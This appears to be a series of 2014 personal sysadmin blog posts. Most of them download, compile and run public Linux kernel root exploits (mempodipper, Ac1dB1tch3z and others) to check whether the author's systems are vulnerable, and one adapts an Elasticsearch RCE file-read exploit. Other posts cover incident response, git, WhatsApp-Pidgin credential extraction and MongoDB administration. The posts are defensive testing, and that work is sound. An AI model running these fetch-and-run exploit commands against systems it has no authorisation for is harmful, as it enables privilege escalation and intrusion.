I have been following the tutorial like using wireshark and tcpdump to get the password, see the attached screen below. This is just not possible because the traffic is encrypted using ssl.
12:07:45.317453 IP (tos 0x0, ttl 64, id 29179, offset 0, flags [DF], proto TCP (6), length 60)
192.168.0.82.62751 > 208.43.122.151-static.reverse.softlayer.com.https: Flags [S], cksum 0x938f (correct), seq 416925910, win 5840, options [mss 1460,sackOK,TS val 2996526 ecr 0,nop,wscale 4], length 0
0x0000: 4500 003c 71fb 4000 4006 bd03 c0a8 0052 E..<q.@.@......R
0x0010: d02b 7a97 f51f 01bb 18d9 c8d6 0000 0000 .+z.............
0x0020: a002 16d0 938f 0000 0204 05b4 0402 080a ................
0x0030: 002d b92e 0000 0000 0103 0304 .-..........
12:07:46.135812 IP (tos 0x0, ttl 54, id 37650, offset 0, flags [DF], proto TCP (6), length 60)
208.43.122.151-static.reverse.softlayer.com.https > 192.168.0.82.62751: Flags [S.], cksum 0xb738 (correct), seq 2641574608, ack 416925911, win 65535, options [mss 1452,nop,wscale 9,sackOK,TS val 3690413789 ecr 2996526], length 0
0x0000: 4500 003c 9312 4000 3606 a5ec d02b 7a97 E..<..@.6....+z.
0x0010: c0a8 0052 01bb f51f 9d73 3ad0 18d9 c8d7 ...R.....s:.....
0x0020: a012 ffff b738 0000 0204 05ac 0103 0309 .....8..........
0x0030: 0402 080a dbf7 3edd 002d b92e ......>..-..
12:07:46.136301 IP (tos 0x0, ttl 64, id 29180, offset 0, flags [DF], proto TCP (6), length 52)
192.168.0.82.62751 > 208.43.122.151-static.reverse.softlayer.com.https: Flags [.], cksum 0xe429 (correct), seq 1, ack 1, win 365, options [nop,nop,TS val 2996630 ecr 3690413789], length 0
0x0000: 4500 0034 71fc 4000 4006 bd0a c0a8 0052 E..4q.@.@......R
0x0010: d02b 7a97 f51f 01bb 18d9 c8d7 9d73 3ad1 .+z..........s:.
0x0020: 8010 016d e429 0000 0101 080a 002d b996 ...m.).......-



That's impossible to decode the traffic if you do not have good knowledge on ssl but that's the whole point of ssl encrypt the message in the transport. So retrieving password via sniffing on the network packet will not work. We will now go to n900 and retrieve the password.

  1. open a X terminal in n900. (if you do not have, you should install now)

  2. change directory to .config/scorpius and check your current directory should be /home/user/.config/scorpius
    $ cd .config/scorpius
    $ pwd
    /home/user/.config/scorpius 

  3. check current directory content with ls
    $ ls
    counters.conf yappari.conf yappari.log

  4. what is important is yappari.conf where it contain the password that is needed. so cat yappari.conf
    $ cat yappari.conf
    [General]
    whatsnew=555555555
    imsi=502121212121212
    registered=true
    number=123456789
    cc=60
    phonenumber=60123456789
    password="ABCDEFGHIJKLMNOPQRSTUVWXYZ/="
    username=JohnSmith
    creation=1407484663
    expiration=1439020663
    kind=free
    accountstatus=active
    lastsync=1407484676392
    status=Available
    lastimagedir=/home/user/MyDocs/DCIM
    nextchallenge="APAPAPAPAPAPAPAPAPAPAPAPAPAP"


You will see similar content as of above, and you should copy and paste the password to your pidgin. Note, because it is long, you might want to copy this file out and copy and paste it.


Fill in the password from step 4 into pidgin password field. Note that below is just an example of demonstration, you should replace your own value.


Password: ABCDEFGHIJKLMNOPQRSTUVWXYZ/=





When you click the checkbox for 'Enabled' for your account, it should now connect.


WhatsApp has a smiley theme called emoji. So you might want to install that as WhatsApp users normally will send in emoji that pidgin will not able to decode and display as a rectangular box with hexadecimal. To install emoji for your what's app, you can follow these steps.



  1. read introduction at https://github.com/davidgfnet/whatsapp-purple/blob/master/README.md#how-do-i-get-graphical-whatsapp-smileys

  2. download the unicode-emoji and emoji-for-pidgin to your home directory.

  3. extract the zip files and copy the directory to your pidgin home.
    $ cp -R android apple symbola $HOME/.purple/smileys
    $ cp -R Emoji-for-Pidgin $HOME/.purple/smileys
    $ ls $HOME/.purple/smileys
    android apple Emoji-for-Pidgin symbola

  4. restart your pidgin and go to Tools -> Preferences -> Themes.

  5. under Smiley Theme, select the emoji you want. :)


That's it. Start sending WhatsApp message from your pc!




UPDATE 


If you have setup whatsapp on pidgin using this published article during the period on 31 August 2014 to 22 November 2014, you should really get the update again. Then in the setting for this whatsapp account in pidgin, under Advanced tab, in the resource field , change to Android-2.31.151-443. Restart pidgin and it should connect again.

Saturday, August 30, 2014

What should you do if the server you administered got hacked.

If you realized that your server has been compromised, this discovery will create confusion, reduce confidence and if the server is serving user requests, you have to declare down time. That's not good.

In order to restore service as quickly as possible, it is best if you have a server ready to replace instantly, that you can reduce the noise from the customers. But in order to prevent such attack coming in the future, you must at least identify how it happened and taking counter measurement.

In this article, we will learn how to discover, and then taking counter measure.

Quick solution.

Probably the quickest solution is to format and reinstall the operating system together with your applications that serve user requests. This probably is good if you do not have a backup server and you want to reinstate the server to serve user requests as soon as possible. But this does not solve the actual problem on how the hacked took place. Hence, it might happen again in the near future.

Long and workable solution.

  1. identify your own custom application deployed and start to investigate from there.

  2. update the system using package manager and restart system.

  3. tighten up security


identify your own custom application deployed and start to investigate from there.

Because open source are mostly tested well and updated often, the first place you are going to investigate mostly come from your own application. Hence, you must at least have good understanding about your app and so to quickly identify source of problem.

Following are a sets of commands which might able to help you in your investigation.

  • w
    who is on the server

  • sudo netstat -nalp | grep ":22"
    change 22 to your application listen to. check if there is any abnormally.

  • if you are using opensource for your custom applications, check the log as well. For which attacker will always find the exploit for the opensource softwares and started to target those.


update the system using package manager and restart system.

First you can start by checking.

  • last
    check when was invalid last access.

  • cat /var/log/secure* | grep Accept
    check invalid access.

  • ps -elf
    check if the malware is running and if you spot one, get the process where it run from and delete all malware files.

  • ls /tmp /var/tmp /dev/shm -la
    this directory normally allow process to write in, so you might want to check any fishy files here.

  • file <filename>
    check what type of the file.

  • cat /etc/passwd
    check if there is unknown entry which is not supposed to be there.

  • sudo netstat -plant |awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' |sort | uniq -c | sort -n| tail
    4 ESTABLISHED java
    4 LISTEN kadmind
    5 LISTEN java
    5 LISTEN python
    6 ESTABLISHED python
    if your server has been turned into a trojan, the malware will probably launching a lot of ddos, with this command, you should be able to identify if the cp connection has been spike.

  • sudo netstat -plant | awk '$4 ~ /:22$/ {print $5}' | cut -f1 -d: | sort | uniq -c | sort -n
    1
    1 0.0.0.0
    2 192.168.0.2
    check total connection established to your server on port 22.

  • sudo netstat -plant | awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
    2 CLOSING
    4 SYN_RECV
    5 LAST_ACK
    6 FIN_WAIT1
    12 LISTEN
    13 FIN_WAIT2
    344 TIME_WAIT
    977 ESTABLISHED
    check network states, this is a good information should your server suddenly spike in the state established or state syn. if there is any spike, you will know something maybe gone fishy.

  • $HOME/.bash_history
    check every users bash_history to see if there is any suspect. If the server application run user a user id, especially check the bash_history in the user home directory.

  • find / -mtime 5
    find what files has been changes since 5 days ago.


If there is nothing found, just update the system packages using package manager and reboot the system.

tighten up security and monitor

if you have a loose firewall policy (iptables or some hardware firewall), you should review it.

Prevention in the future would probably notify when the count of TCP connection exceed or suddenly spike to a threshold.

 

whilst these steps are not exhaustive, as evil people always come with different type attacks, thus you should be prepare and be alert. Gather information using google as well.

Friday, August 29, 2014

Where to read branch work (or commits) in github?

Have you been stuck either of these situations:

  • a lot of times, when you do your works on branch, and as days passed, you wanna review your own codes by browsing through the history but no idea how?

  • or maybe you want to let you colleague take a look at the work you have done and code review for you?

  • or see the changes you made in the branch and write a change log before you merge back into the master branch.


Today, we are going to learn just that.

With command line, you can use git log. LEAD-451 is an example of my branch and it is here for illustration purposes but you should change to the branch you want to view.
git log master...LEAD-451

this will show the changes including commit, author, date, message. If you notice, the order is chronological, with latest being to top and oldest at the bottom. You can use --reverse to see the oldest first.

If you want to see the file status, if you add --name-status to the command

.If you want to see the actual code changes, it is very intuitive, you use git diff. So
git diff master...LEAD-451

and you get a lengthy code different output between branch master and branch LEAD-451. If you want to generate a patch, you can give -p to the command. If you want to see what files change/add/delete between these two branches, you can add parameter --name-status or --name-only.

Enough for the command line, now we go for some visual representation. For this, I will illustrate using github.

With the same condition, in github, there is a feature called compare view.

https://github.com/Opentracker/luceneOnCassandra/compare/master...LEAD-451

As you can see on the bottom, the output is very much same with the command line we have tried before this. But github condense everything into one , very nice.

Assuming you are at your project landing page at github, how do you quickly get the compare view?

  • at the front page, https://github.com/Opentracker/luceneOnCassandra/

  • click on the branch drop down, select the branch you want to diff. example LEAD-451

  • at the page https://github.com/Opentracker/luceneOnCassandra/tree/LEAD-451, you can click on the compare button.


 

That's it, I hope you learned something and please donate as a mean to continue funding this blog maintenance. Thank you.

Sunday, August 17, 2014

CVE-2009-2692 Linux NULL pointer dereference due to incorrect proto_ops initializations

Again as same with previous cve posts, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source (or you can download original source here) is written in c and it require some level of understanding into linux system as well. You should find explanation for the source exploit.c herehere or here.  As explain in the documentation, this exploit mainly target this kernel version:

  • kernel 2.6.0 to 2.6.30.4

  • kernel 2.4.4 to 2.4.37.4


So check your system if your server kernel falled within this range and do a kernel update if it does as there is already fixed.

According to the cve, description for this exploit

The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.

Okay, let's download the source and try it.
user@localhost:~/Desktop/exploit/wunderbar_emporium$ whoami
user
user@localhost:~/Desktop/exploit/wunderbar_emporium$ sh -x wunderbar_emporium.sh
++ pwd
++ sed 's/\//\\\//g'
+ ESCAPED_PWD='\/home\/user\/Desktop\/exploit\/wunderbar_emporium'
+ sed 's/\/home\/spender/\/home\/user\/Desktop\/exploit\/wunderbar_emporium/g' pwnkernel.c
+ mv pwnkernel.c pwnkernel2.c
+ mv pwnkernel1.c pwnkernel.c
+ killall -9 pulseaudio
++ uname -p
+ IS_64=unknown
+ OPT_FLAG=
+ '[' unknown = x86_64 ']'
++ cat /proc/sys/vm/mmap_min_addr
+ MINADDR=65536
+ '[' 65536 = '' -o 65536 = 0 ']'
+ '[' '!' -f /usr/sbin/getenforce ']'
+ cc -fno-stack-protector -fPIC -shared -o exploit.so exploit.c
+ cc -o pwnkernel pwnkernel.c
+ ./pwnkernel
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!
+ mv -f pwnkernel2.c pwnkernel.c
user@localhostp:~/Desktop/exploit/wunderbar_emporium$ whoami
user

So this server is not vulnerable for this exploit! All good.

Friday, August 15, 2014

information for malware Linux_time_y_2014 and Linux_time_y_2015 are needed

This article is a bit special. It is more like seeking information and documentating it. If you have this type of information, please leave your comment below.

If you have noticed that the followings file exists in your system

  • Linux_time_y_2014

  • Linux_time_y_2015 or xudp

  • .E7739C9DFEAC5B8A69A114E45AB327D41 or mysql1.0

  • .E7739C9DFEAC5B8A69A114E45AB327D4 or mysql1s


This is a malwares which if it is uploaded or copy to your server, you should check if it is running in the system and remove if it does.

I googled and search in social sites, there is not much information other than identified this as a malware. If you happened to know what cve or where is the source, please kindly leave the message in the comment.

The intention is to understand what does this malware does other than launching it as ddos. To document it down here and to provide information to others if they seek more information. If you know how to disect this binary and analyze the content, please do share as well.

Thank you.

Sunday, August 3, 2014

CVE-2014-0196 kernel: pty layer race condition leading to memory corruption

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source is written in c and it require some level of understanding into linux system as well. You should find explanation for the source cve-2014-0196-md.c here. If you run an old system, then you might want to read more. But check your kernel that comes with your distribution, it may already been fixed.

From the description:

The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.

Okay, let's move on to compile and test it out.
user@localhost:~$ wget -O cve-2014-0196-md.c http://bugfuzz.com/stuff/cve-2014-0196-md.c
user@localhost:~$ gcc cve-2014-0196-md.c -lutil -lpthread
user@localhost:~$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: 0xffffffff8105bb28
[+] Resolved prepare_kernel_cred: 0xffffffff8105bd3b
[+] Doing once-off allocations
[+] Attempting to overflow into a tty_struct......
........................................................................................................................................................................................................................................................................................................................................................................................................................^C

Apparently this kernel is not vulnerable to this exploit. Another great day. :-)

Saturday, August 2, 2014

CVE-2012-0056 mempodipper

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source is written in c and it require some level of understanding into linux system as well. You should find explanation for the source mempodipper.c here. But it has since been fix in this patch. So all of the distribution should have this fix in the kernel anyway. But in case you run at old system with kernel 2.6.39 or a non stock kernel, then you might want to read more.

With that said, let's download this source and compile it.
user@localhost:~$ wget http://www.exploit-db.com/download/18411 -O 18411.c
--2014-07-19 16:52:59-- http://www.exploit-db.com/download/18411
Resolving www.exploit-db.com (www.exploit-db.com)... 192.99.12.218, 198.58.102.135
Connecting to www.exploit-db.com (www.exploit-db.com)|192.99.12.218|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/18411/ [following]
--2014-07-19 16:53:00-- http://www.exploit-db.com/download/18411/
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 6348 (6.2K) [application/txt]
Saving to: ‘18411.c’

100%[====================================================================================================================>] 6,348 --.-K/s in 0.001s

2014-07-19 16:53:00 (7.31 MB/s) - ‘18411.c’ saved [6348/6348]

user@localhost:~$ gcc 18411.c -o 18411
user@localhost:~$ ./18411
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7398/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x4022c0.
[+] Calculating su padding.
[+] Seeking to offset 0x4022a6.
[+] Executing su with shellcode.
^C
user@localhost:~$ whoami
user

So we have downloaded the source, compile it using gcc and run it. If you notice in the video, if the kernel are vulnerable to this exploit, this exploit will finish run successfully and issue the command whoami, root is shown. But for this example above, my kernel is compiled with the fix so the computer system is safe. You can get this library and copy to the server you want to check to make sure the exploit did not run successfully.

That's it for this article, I hope you enjoy this writing.

Friday, August 1, 2014

CVE-2014-3120 Elastic Search Remote Code Execution

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who uses elastic search cluster in their production system and to make a living for the family. This blog is to make aware for those who deploy elasticsearch cluster and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

To quickly fix for this issue, you should set this
script.disable_dynamic: true

to your elasticsearch.yaml configuration file and restart elasticsearch instance.

If you have noticed, disable_dynamic is set to false in elasticsearch version 1.1.2 and below. However, it is set to true after 1.2.0.

Just load this html file CVE-2014-3120 in your browser and then change the field "ES_IP_Address" and the and field "File to read/append to". If your es allow access via port 9200, it will show the content but if you  have block the port and disable the dynamic scripting, then you are safe.

If the file content is shown, then you can start to write to it. You need to change the html source to allow write. When this happened, the attacker will be able to gain access to your box using public/private key. That's not good!

The said html file is adaptation from http://www.exploit-db.com/exploits/33370/ and if you are interested to read more, please read this link.

Friday, July 25, 2014

CVE-2010-3081 Ac1dB1tch3z

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This exploit only vulnerable to kernel version 2.6.26-rc1 to 2.6.36-rc4. So be
alert if your production server are runnning these kernel. It has since been
fixed in the upstream as it can be found here.

So what is this exploit about?

A vulnerability in the 32-bit compatibility layer for 64-bit systems was reported. It is caused by insecure allocation of user space memory when translating system call inputs to 64-bit. A stack pointer underflow can occur when using the "compat_alloc_user_space" method inside arch/x86/include/asm/compat.h with an arbitrary length input.

or the long description here and here

Get the source here and compile it.
user@localhost:~$ gcc -m32 15024.c -o 15024
user@localhost:~$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!

If the kernel is vulnerable to this exploit, check output below.
[bob@xxx ~]$ date
Sun Sep 19 18:22:38 BRT 2010
[bob@xxx ~]$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
[bob@xxx ~]$ uname -a
Linux xxx 2.6.18-194.11.3.el5 #1 SMP Mon Aug 23 15:51:38 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
[bob@xxx ~]$ id
uid=500(bob) gid=500(bob) groups=500(bob)
[bob@xxx ~]$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.11.3.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=500(bob) groups=500(bob)

That's it! Stay safe.

Sunday, July 20, 2014

Study MongoDB administration

Today we are going to look into MongoDB administration. We will focus on a few areas, the backup, monitoring, configuration, import and export data.

backup and restore

  • journaling must be enabled on the logical volume.


To backup, start by using command mongodump.

jason@localhost:~$ mongodump
connected to: 127.0.0.1
2014-07-07T22:46:09.351+0800 all dbs
2014-07-07T22:46:09.352+0800 DATABASE: test to dump/test
2014-07-07T22:46:09.354+0800 test.system.indexes to dump/test/system.indexes.bson
2014-07-07T22:46:09.355+0800 4 documents
2014-07-07T22:46:09.356+0800 test.testData to dump/test/testData.bson
2014-07-07T22:46:09.359+0800 400 documents
2014-07-07T22:46:09.360+0800 Metadata for test.testData to dump/test/testData.metadata.json
2014-07-07T22:46:09.360+0800 test.users to dump/test/users.bson
2014-07-07T22:46:09.361+0800 1 documents
2014-07-07T22:46:09.362+0800 Metadata for test.users to dump/test/users.metadata.json
2014-07-07T22:46:09.362+0800 test.accounts to dump/test/accounts.bson
2014-07-07T22:46:09.369+0800 2 documents
2014-07-07T22:46:09.370+0800 Metadata for test.accounts to dump/test/accounts.metadata.json
2014-07-07T22:46:09.370+0800 test.transactions to dump/test/transactions.bson
2014-07-07T22:46:09.372+0800 1 documents
2014-07-07T22:46:09.373+0800 Metadata for test.transactions to dump/test/transactions.metadata.json
2014-07-07T22:46:09.374+0800 DATABASE: mydb to dump/mydb
2014-07-07T22:46:09.375+0800 mydb.system.indexes to dump/mydb/system.indexes.bson
2014-07-07T22:46:09.376+0800 2 documents
2014-07-07T22:46:09.377+0800 mydb.testData to dump/mydb/testData.bson
2014-07-07T22:46:09.378+0800 27 documents
2014-07-07T22:46:09.389+0800 Metadata for mydb.testData to dump/mydb/testData.metadata.json
2014-07-07T22:46:09.390+0800 mydb.users to dump/mydb/users.bson
2014-07-07T22:46:09.391+0800 1 documents
2014-07-07T22:46:09.392+0800 Metadata for mydb.users to dump/mydb/users.metadata.json
2014-07-07T22:46:09.392+0800 DATABASE: mp3db to dump/mp3db
2014-07-07T22:46:09.393+0800 mp3db.system.indexes to dump/mp3db/system.indexes.bson
2014-07-07T22:46:09.394+0800 4 documents
2014-07-07T22:46:09.395+0800 mp3db.mp3.files to dump/mp3db/mp3.files.bson
2014-07-07T22:46:09.396+0800 1 documents
2014-07-07T22:46:09.397+0800 Metadata for mp3db.mp3.files to dump/mp3db/mp3.files.metadata.json
2014-07-07T22:46:09.397+0800 mp3db.mp3.chunks to dump/mp3db/mp3.chunks.bson
2014-07-07T22:46:09.401+0800 2 documents
2014-07-07T22:46:09.401+0800 Metadata for mp3db.mp3.chunks to dump/mp3db/mp3.chunks.metadata.json
2014-07-07T22:46:09.402+0800 DATABASE: admin to dump/admin
2014-07-07T22:46:09.406+0800 DATABASE: config to dump/config

Let's remove some data from the database before we restore.
jason@localhost:~$ mongo
MongoDB shell version: 2.6.3
connecting to: test
Server has startup warnings:
2014-06-24T21:23:40.227+0800 [initandlisten]
2014-06-24T21:23:40.227+0800 [initandlisten] ** NOTE: This is a 32 bit MongoDB binary.
2014-06-24T21:23:40.227+0800 [initandlisten] ** 32 bit builds are limited to less than 2GB of data (or less with --journal).
2014-06-24T21:23:40.227+0800 [initandlisten] ** Note that journaling defaults to off for 32 bit and is currently off.
2014-06-24T21:23:40.228+0800 [initandlisten] ** See http://dochub.mongodb.org/core/32bit
2014-06-24T21:23:40.228+0800 [initandlisten]
> use mp3db;
switched to db mp3db
> show tables;
mp3.chunks
mp3.files
system.indexes
> db.mp3.chunks.remove({});
WriteResult({ "nRemoved" : 2 })
> db.mp3.files.remove({});
WriteResult({ "nRemoved" : 1 })
> db.mp3.chunks.find();
> db.mp3.files.find();
>

Now we restore using command mongorestore.
jason@localhost:~$ mongorestore --collection mp3.chunks --db mp3db dump/mp3db/mp3.chunks.bson
connected to: 127.0.0.1
2014-07-07T23:14:43.504+0800 dump/mp3db/mp3.chunks.bson
2014-07-07T23:14:43.504+0800 going into namespace [mp3db.mp3.chunks]
Restoring to mp3db.mp3.chunks without dropping. Restored data will be inserted without raising errors; check your server log
2 objects found
2014-07-07T23:14:43.534+0800 Creating index: { key: { _id: 1 }, name: "_id_", ns: "mp3db.mp3.chunks" }
2014-07-07T23:14:43.635+0800 Creating index: { key: { files_id: 1, n: 1 }, name: "files_id_1_n_1", ns: "mp3db.mp3.chunks" }

jason@localhost:~$ mongorestore --collection mp3.files --db mp3db dump/mp3db/mp3.files.bson
connected to: 127.0.0.1
2014-07-07T23:17:24.813+0800 dump/mp3db/mp3.files.bson
2014-07-07T23:17:24.813+0800 going into namespace [mp3db.mp3.files]
Restoring to mp3db.mp3.files without dropping. Restored data will be inserted without raising errors; check your server log
1 objects found
2014-07-07T23:17:24.819+0800 Creating index: { key: { _id: 1 }, name: "_id_", ns: "mp3db.mp3.files" }
2014-07-07T23:17:24.822+0800 Creating index: { key: { filename: 1, uploadDate: 1 }, name: "filename_1_uploadDate_1", ns: "mp3db.mp3.files" }

Looks good, the restoration process and now we verify the content.
jason@localhost:~$ mongo
MongoDB shell version: 2.6.3
connecting to: test
Server has startup warnings:
2014-06-24T21:23:40.227+0800 [initandlisten]
2014-06-24T21:23:40.227+0800 [initandlisten] ** NOTE: This is a 32 bit MongoDB binary.
2014-06-24T21:23:40.227+0800 [initandlisten] ** 32 bit builds are limited to less than 2GB of data (or less with --journal).
2014-06-24T21:23:40.227+0800 [initandlisten] ** Note that journaling defaults to off for 32 bit and is currently off.
2014-06-24T21:23:40.228+0800 [initandlisten] ** See http://dochub.mongodb.org/core/32bit
2014-06-24T21:23:40.228+0800 [initandlisten]
> use mp3db;
switched to db mp3db
> db.mp3.files.find();
{ "_id" : ObjectId("53ad61c844ae8a6ee12fcb63"), "chunkSize" : NumberLong(262144), "length" : NumberLong(316773), "md5" : "7293e9fd795e2bb6d5035e5b69cb2923", "filename" : "django.mp3", "contentType" : "audio/mpeg", "uploadDate" : ISODate("2014-06-27T12:21:28.646Z"), "aliases" : null }
>

Looks good. Now we move on to monitoring.

monitoring

mongostats - captures and returns the counts of database operations by type (e.g. insert, query, update, delete, etc.). These counts report on the load distribution on the server.
jason@localhost:~$ mongostat
connected to: 127.0.0.1
insert query update delete getmore command flushes mapped vsize res faults locked db idx miss % qr|qw ar|aw netIn netOut conn time
*0 *0 *0 *0 0 1|0 0 320m 445m 10m 14 config:0.0% 0 0|0 0|0 62b 3k 1 22:33:54
*0 *0 *0 *0 0 1|0 0 320m 445m 10m 0 test:0.0% 0 0|0 0|0 62b 3k 1 22:33:55
*0 *0 *0 *0 0 1|0 0 320m 445m 10m 0 test:0.0% 0 0|0 0|0 62b 3k 1 22:33:56
^C

mongotop tracks and reports the current read and write activity of a MongoDB instance, and reports these statistics on a per collection basis.
jason@localhost:~$ mongotop
connected to: 127.0.0.1

ns total read write 2014-07-07T15:20:38
mp3db.mp3.chunks 0ms 0ms 0ms
local.system.replset 0ms 0ms 0ms
local.system.namespaces 0ms 0ms 0ms
local.system.indexes 0ms 0ms 0ms
local.startup_log 0ms 0ms 0ms
config.version 0ms 0ms 0ms
config.system.namespaces 0ms 0ms 0ms

ns total read write 2014-07-07T15:20:39
mp3db.mp3.chunks 0ms 0ms 0ms
local.system.replset 0ms 0ms 0ms
local.system.namespaces 0ms 0ms 0ms
local.system.indexes 0ms 0ms 0ms
local.startup_log 0ms 0ms 0ms
config.version 0ms 0ms 0ms
config.system.namespaces 0ms 0ms 0ms
^C
jason@localhost:~$

HTTP Console - MongoDB provides a web interface that exposes diagnostic and monitoring information in a simple web page. For example , by accessing http://192.168.0.2:27017/

Now using db.serverStatus() from the mongo shell. The serverStatus command, or db.serverStatus() from the shell, returns a general overview of the status of the database, detailing disk usage, memory use, connection, journaling, and index access. The command returns quickly and does not impact MongoDB performance.
> db.serverStatus()
{
"host" : "debby.e2e.serveftp.net",
"version" : "2.6.3",
"process" : "mongod",
"pid" : NumberLong(3651),
"uptime" : 1130615,
"uptimeMillis" : NumberLong(1130614302),
"uptimeEstimate" : 1115929,
"localTime" : ISODate("2014-07-07T15:27:14.416Z"),
"asserts" : {
"regular" : 0,
"warning" : 0,
"msg" : 0,
"user" : 2,
"rollovers" : 0
},
"backgroundFlushing" : {
"flushes" : 18843,
"total_ms" : 127648,
"average_ms" : 6.774292840842754,
"last_ms" : 2,
"last_finished" : ISODate("2014-07-07T15:26:43.282Z")
},
"connections" : {
"current" : 1,
"available" : 51199,
"totalCreated" : NumberLong(57)
},
"cursors" : {
"note" : "deprecated, use server status metrics",
"clientCursors_size" : 0,
"totalOpen" : 0,
"pinned" : 0,
"totalNoTimeout" : 2,
"timedOut" : 1
},
"extra_info" : {
"note" : "fields vary by platform",
"heap_usage_bytes" : 23483832,
"page_faults" : 13958
},
"globalLock" : {
"totalTime" : NumberLong("1130614310000"),
"lockTime" : NumberLong(184448),
"currentQueue" : {
"total" : 0,
"readers" : 0,
"writers" : 0
},
"activeClients" : {
"total" : 0,
"readers" : 0,
"writers" : 0
}
},
"indexCounters" : {
"accesses" : 451,
"hits" : 451,
"misses" : 0,
"resets" : 0,
"missRatio" : 0
},
"locks" : {
"." : {
"timeLockedMicros" : {
"R" : NumberLong(149),
"W" : NumberLong(184448)
},
"timeAcquiringMicros" : {
"R" : NumberLong(29),
"W" : NumberLong(32)
}
},
"admin" : {
"timeLockedMicros" : {
"r" : NumberLong(7348709),
"w" : NumberLong(0)
},
"timeAcquiringMicros" : {
"r" : NumberLong(55635),
"w" : NumberLong(0)
}
},
"local" : {
"timeLockedMicros" : {
"r" : NumberLong(59492773),
"w" : NumberLong(32)
},
"timeAcquiringMicros" : {
"r" : NumberLong(3164744),
"w" : NumberLong(3)
}
},
"config" : {
"timeLockedMicros" : {
"r" : NumberLong(182516),
"w" : NumberLong(0)
},
"timeAcquiringMicros" : {
"r" : NumberLong(46473),
"w" : NumberLong(0)
}
},
"mydb" : {
"timeLockedMicros" : {
"r" : NumberLong(43791920),
"w" : NumberLong(118)
},
"timeAcquiringMicros" : {
"r" : NumberLong(2159715),
"w" : NumberLong(9)
}
},
"test" : {
"timeLockedMicros" : {
"r" : NumberLong(28235652),
"w" : NumberLong(252)
},
"timeAcquiringMicros" : {
"r" : NumberLong(4052053),
"w" : NumberLong(19)
}
},
"mp3db" : {
"timeLockedMicros" : {
"r" : NumberLong(42491162),
"w" : NumberLong(1053565)
},
"timeAcquiringMicros" : {
"r" : NumberLong(6120501),
"w" : NumberLong(832)
}
}
},
"network" : {
"bytesIn" : 13516862,
"bytesOut" : 34014948,
"numRequests" : 733
},
"opcounters" : {
"insert" : 112,
"query" : 100247,
"update" : 0,
"delete" : 18,
"getmore" : 3,
"command" : 344
},
"opcountersRepl" : {
"insert" : 0,
"query" : 0,
"update" : 0,
"delete" : 0,
"getmore" : 0,
"command" : 0
},
"recordStats" : {
"accessesNotInMemory" : 10,
"pageFaultExceptionsThrown" : 1,
"admin" : {
"accessesNotInMemory" : 0,
"pageFaultExceptionsThrown" : 0
},
"config" : {
"accessesNotInMemory" : 0,
"pageFaultExceptionsThrown" : 0
},
"local" : {
"accessesNotInMemory" : 1,
"pageFaultExceptionsThrown" : 0
},
"mp3db" : {
"accessesNotInMemory" : 1,
"pageFaultExceptionsThrown" : 1
},
"mydb" : {
"accessesNotInMemory" : 2,
"pageFaultExceptionsThrown" : 0
},
"test" : {
"accessesNotInMemory" : 6,
"pageFaultExceptionsThrown" : 0
}
},
"writeBacksQueued" : false,
"mem" : {
"bits" : 32,
"resident" : 12,
"virtual" : 445,
"supported" : true,
"mapped" : 320
},
"metrics" : {
"cursor" : {
"timedOut" : NumberLong(1),
